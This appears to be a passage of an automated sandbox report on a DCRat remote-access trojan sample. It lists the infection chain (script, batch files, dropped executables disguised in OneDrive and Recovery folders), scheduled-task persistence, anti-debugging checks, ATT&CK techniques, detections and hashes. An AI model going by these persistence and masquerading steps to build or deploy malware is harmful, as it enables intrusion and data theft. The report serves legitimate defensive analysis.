                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_004FA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_004FA69B
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_0050C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0050C220
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_0050E6A3 VirtualQuery,GetSystemInfo,0_2_0050E6A3
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeThread delayed: delay time: 922337203685477
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: wscript.exe, 00000001.00000003.1935610244.00000000034CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\T
                                    Source: wscript.exe, 00000001.00000003.1935610244.00000000034CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: hyperruntimemonitorCommon.exe, 00000007.00000002.2025482603.000000001CA4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                    Source: hyperruntimemonitorCommon.exe, 00000007.00000002.2025551689.000000001CA64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: C:\Users\user\Desktop\f3I38kv.exeAPI call chain: ExitProcess graph end nodegraph_0-25071
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9BC834C9 rdtsc 7_2_00007FFD9BC834C9
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_0050F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0050F838
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_00517DEE mov eax, dword ptr fs:[00000030h]0_2_00517DEE
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_0051C030 GetProcessHeap,0_2_0051C030
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_0050F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0050F838
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_0050F9D5 SetUnhandledExceptionFilter,0_2_0050F9D5
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_0050FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0050FBCA
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_00518EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00518EBD
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockbrowserdllCommon\KvkJOplk2GTpcDyjoXWpi6SQDRLpKp2SGwZjihDz.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockbrowserdllCommon\ZUKrGOW39NDMa.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe "C:\blockbrowserdllCommon/hyperruntimemonitorCommon.exe"Jump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qVPGMYvCwM.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe "C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe" Jump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_0050F654 cpuid 0_2_0050F654
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0050AF0F
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeQueries volume information: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe VolumeInformationJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeQueries volume information: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeQueries volume information: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe VolumeInformation
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeQueries volume information: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_0050DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0050DF1E
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_004FB146 GetVersionExW,0_2_004FB146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Source: Yara matchFile source: 00000007.00000002.1996199845.0000000013408000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: hyperruntimemonitorCommon.exe PID: 1832, type: MEMORYSTR
                                    Source: Yara matchFile source: f3I38kv.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.f3I38kv.exe.5262707.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.f3I38kv.exe.5374707.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 7.0.hyperruntimemonitorCommon.exe.a00000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.f3I38kv.exe.5262707.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.f3I38kv.exe.5374707.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1659074697.0000000005326000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000007.00000000.1936497024.0000000000A02000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1658269779.0000000005214000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\SIHClient.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe, type: DROPPED
                                    Source: Yara matchFile source: f3I38kv.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.f3I38kv.exe.5262707.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.f3I38kv.exe.5374707.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 7.0.hyperruntimemonitorCommon.exe.a00000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.f3I38kv.exe.5262707.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.f3I38kv.exe.5374707.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\SIHClient.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe, type: DROPPED

                                    Remote Access Functionality

                                    barindex
                                    Source: Yara matchFile source: 00000007.00000002.1996199845.0000000013408000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: hyperruntimemonitorCommon.exe PID: 1832, type: MEMORYSTR
                                    Source: Yara matchFile source: f3I38kv.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.f3I38kv.exe.5262707.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.f3I38kv.exe.5374707.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 7.0.hyperruntimemonitorCommon.exe.a00000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.f3I38kv.exe.5262707.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.f3I38kv.exe.5374707.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1659074697.0000000005326000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000007.00000000.1936497024.0000000000A02000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1658269779.0000000005214000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\SIHClient.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe, type: DROPPED
                                    Source: Yara matchFile source: f3I38kv.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.f3I38kv.exe.5262707.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.f3I38kv.exe.5374707.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 7.0.hyperruntimemonitorCommon.exe.a00000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.f3I38kv.exe.5262707.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.f3I38kv.exe.5374707.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\SIHClient.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe, type: DROPPED
                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting
                                    Valid Accounts111
                                    Windows Management Instrumentation
                                    1
                                    Scheduled Task/Job
                                    11
                                    Process Injection
                                    33
                                    Masquerading
                                    OS Credential Dumping1
                                    System Time Discovery
                                    Remote Services1
                                    Archive Collected Data
                                    1
                                    Encrypted Channel
                                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts2
                                    Command and Scripting Interpreter
                                    11
                                    Scripting
                                    1
                                    Scheduled Task/Job
                                    1
                                    Disable or Modify Tools
                                    LSASS Memory141
                                    Security Software Discovery
                                    Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts1
                                    Scheduled Task/Job
                                    1
                                    DLL Side-Loading
                                    1
                                    DLL Side-Loading
                                    41
                                    Virtualization/Sandbox Evasion
                                    Security Account Manager1
                                    Process Discovery
                                    SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                                    Process Injection
                                    NTDS41
                                    Virtualization/Sandbox Evasion
                                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    Deobfuscate/Decode Files or Information
                                    LSA Secrets1
                                    Remote System Discovery
                                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                                    Obfuscated Files or Information
                                    Cached Domain Credentials1
                                    System Network Configuration Discovery
                                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                    Software Packing
                                    DCSync3
                                    File and Directory Discovery
                                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                    DLL Side-Loading
                                    Proc Filesystem37
                                    System Information Discovery
                                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1582378 Sample: f3I38kv.exe Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 57 Suricata IDS alerts for network traffic 2->57 59 Found malware configuration 2->59 61 Antivirus detection for dropped file 2->61 63 12 other signatures 2->63 10 f3I38kv.exe 3 6 2->10         started        13 nGnJvqnFLoRdIZNyVoMyF.exe 3 2->13         started        15 nGnJvqnFLoRdIZNyVoMyF.exe 2->15         started        process3 file4 53 C:\...\hyperruntimemonitorCommon.exe, PE32 10->53 dropped 17 wscript.exe 1 10->17         started        process5 signatures6 55 Windows Scripting host queries suspicious COM object (likely to drop second stage) 17->55 20 cmd.exe 1 17->20         started        process7 process8 22 hyperruntimemonitorCommon.exe 3 42 20->22         started        26 conhost.exe 20->26         started        file9 45 C:\Windows\...\dllhost.exe, PE32 22->45 dropped 47 C:\Users\user\...\nGnJvqnFLoRdIZNyVoMyF.exe, PE32 22->47 dropped 49 C:\Users\user\Desktop\yVcnRIer.log, PE32 22->49 dropped 51 29 other malicious files 22->51 dropped 65 Uses schtasks.exe or at.exe to add and modify task schedules 22->65 67 Creates processes via WMI 22->67 28 cmd.exe 1 22->28         started        31 schtasks.exe 22->31         started        33 schtasks.exe 22->33         started        35 13 other processes 22->35 signatures10 process11 signatures12 69 Uses ping.exe to sleep 28->69 71 Uses ping.exe to check the status of other devices and networks 28->71 37 conhost.exe 28->37         started        39 chcp.com 28->39         started        41 PING.EXE 28->41         started        43 nGnJvqnFLoRdIZNyVoMyF.exe 28->43         started        process13

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand
                                    SourceDetectionScannerLabelLink
                                    f3I38kv.exe53%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    f3I38kv.exe100%AviraVBS/Runner.VPG
                                    f3I38kv.exe100%Joe Sandbox ML
                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\AppData\Local\Temp\qVPGMYvCwM.bat100%AviraBAT/Delbat.C
                                    C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\rfYGTcKI.log100%AviraHEUR/AGEN.1300079
                                    C:\Users\user\Desktop\ZLNiVXPn.log100%AviraTR/Agent.jbwuj
                                    C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\kikGqNQT.log100%AviraHEUR/AGEN.1300079
                                    C:\Users\user\Desktop\KpbTIyuS.log100%AviraHEUR/AGEN.1362695
                                    C:\Users\user\Desktop\DzXmKSai.log100%AviraTR/AVI.Agent.updqb
                                    C:\Users\user\Desktop\omJXhfZJ.log100%AviraHEUR/AGEN.1300079
                                    C:\Recovery\SIHClient.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\yEVVDmkp.log100%AviraHEUR/AGEN.1300079
                                    C:\Users\user\Desktop\JsALnyfX.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\wTqFwYZw.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\uWPwaYLB.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\nYbxxKQM.log100%Joe Sandbox ML
                                    C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\rfYGTcKI.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\YTwAzGpt.log100%Joe Sandbox ML
                                    C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\kikGqNQT.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\KpbTIyuS.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\cBDZcTPh.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\omJXhfZJ.log100%Joe Sandbox ML
                                    C:\Recovery\SIHClient.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\hxFqjzFa.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\yEVVDmkp.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\AOsWDEPp.log3%ReversingLabs
                                    C:\Users\user\Desktop\DIumuEtf.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                    C:\Users\user\Desktop\DzXmKSai.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\JsALnyfX.log29%ReversingLabsWin32.Trojan.Generic
                                    C:\Users\user\Desktop\KpbTIyuS.log17%ReversingLabs
                                    C:\Users\user\Desktop\KxLmnhVX.log5%ReversingLabs
                                    C:\Users\user\Desktop\OnCcudVQ.log12%ReversingLabs
                                    C:\Users\user\Desktop\PkdkPdkL.log25%ReversingLabs
                                    C:\Users\user\Desktop\WahSOJEu.log29%ReversingLabs
                                    C:\Users\user\Desktop\YTwAzGpt.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\ZLNiVXPn.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\azRqGkKl.log9%ReversingLabs
                                    C:\Users\user\Desktop\cBDZcTPh.log21%ReversingLabs
                                    C:\Users\user\Desktop\fDqHyDTc.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\hxFqjzFa.log9%ReversingLabs
                                    C:\Users\user\Desktop\kikGqNQT.log25%ReversingLabs
                                    C:\Users\user\Desktop\nYbxxKQM.log16%ReversingLabs
                                    C:\Users\user\Desktop\omJXhfZJ.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\pixyxcvN.log25%ReversingLabs
                                    C:\Users\user\Desktop\rfYGTcKI.log17%ReversingLabs
                                    C:\Users\user\Desktop\scAOpcZD.log8%ReversingLabs
                                    C:\Users\user\Desktop\uWPwaYLB.log8%ReversingLabs
                                    C:\Users\user\Desktop\wKTFMmGz.log21%ReversingLabs
                                    C:\Users\user\Desktop\wTqFwYZw.log5%ReversingLabs
                                    C:\Users\user\Desktop\yEVVDmkp.log4%ReversingLabs
                                    C:\Users\user\Desktop\yVcnRIer.log8%ReversingLabs
                                    No Antivirus matches
                                    No Antivirus matches
                                    No Antivirus matches
                                    No contacted domains info
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehyperruntimemonitorCommon.exe, 00000007.00000002.1990215606.000000000341B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      No contacted IP infos
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1582378
                                      Start date and time:2024-12-30 13:17:06 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 8m 16s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:38
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:f3I38kv.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@35/44@0/0
                                      EGA Information:
                                      • Successful, ratio: 60%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 184.28.90.27, 13.107.246.45
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, vds-898383.1gb.ru, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target nGnJvqnFLoRdIZNyVoMyF.exe, PID 1880 because it is empty
                                      • Execution Graph export aborted for target nGnJvqnFLoRdIZNyVoMyF.exe, PID 6328 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: f3I38kv.exe
                                      TimeTypeDescription
                                      12:18:29Task SchedulerRun new task: dllhost path: "C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe"
                                      12:18:29Task SchedulerRun new task: dllhostd path: "C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe"
                                      12:18:29Task SchedulerRun new task: nGnJvqnFLoRdIZNyVoMyF path: "C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe"
                                      12:18:29Task SchedulerRun new task: nGnJvqnFLoRdIZNyVoMyFn path: "C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe"
                                      12:18:29Task SchedulerRun new task: SIHClient path: "C:\Recovery\SIHClient.exe"
                                      12:18:29Task SchedulerRun new task: SIHClientS path: "C:\Recovery\SIHClient.exe"
                                      No context
                                      No context
                                      No context
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\Desktop\AOsWDEPp.logXNPOazHpXF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        3e88PGFfkf.exeGet hashmaliciousDCRatBrowse
                                          9FwQYJSj4N.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            CPNSQusnwC.exeGet hashmaliciousDCRatBrowse
                                              t8xf0Y1ovi.exeGet hashmaliciousDCRatBrowse
                                                teh76E2k50.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    84JufgBTrA.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        kIdT4m0aa4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:ASCII text, with very long lines (862), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):862
                                                          Entropy (8bit):5.9081589499556735
                                                          Encrypted:false
                                                          SSDEEP:24:RP2Kl2RH6cl2EEwll51UgHLEtrDo5zG2CoXL8S9re8HlwzNCjG:R+M2dtL3HLEtw54S968Fsx
                                                          MD5:860881ECF552F4435551EC827873317D
                                                          SHA1:8F1968487C170BB587B69F2A4D66243AC42A9925
